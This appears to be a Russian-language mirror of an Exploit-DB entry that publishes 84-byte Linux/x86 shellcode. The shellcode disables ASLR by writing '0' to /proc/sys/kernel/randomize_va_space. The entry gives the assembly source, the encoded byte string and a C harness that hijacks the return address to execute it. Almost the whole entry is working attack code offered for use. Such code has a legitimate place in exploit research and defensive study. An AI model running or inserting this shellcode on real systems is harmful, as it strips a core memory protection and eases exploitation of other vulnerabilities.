- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36637
- Проверка EDB
-
- Пройдено
- Автор
- MOHAMMAD REZA RAMEZANI
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2015-04-03
Linux/x86 - Disable ASLR Security Shellcode (84 bytes)
C:
/*
#Title: Disable ASLR in Linux (less byte and more compact)
#Length: 84 bytes
#Date: 3 April 2015
#Author: Mohammad Reza Ramezani ([email protected] - g+)
#Tested On: kali-linux-1.0.6-i386
Thanks to stackoverflow
section .text
global _start
_start:
jmp short fileaddress
shellcode:
pop ebx
xor eax,eax
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h
mov ebx, eax
push byte 4
pop eax
jmp short output
cont:
pop ecx
push byte 2
pop edx
int 80h
push byte 1
pop eax
xor ebx, ebx
int 80h
fileaddress:
call shellcode
db '/proc/sys/kernel/randomize_va_spaceX'
output:
call cont
db '0',10
*/
char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
"\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a
\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70
\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72
\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63
\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
- Источник
- www.exploit-db.com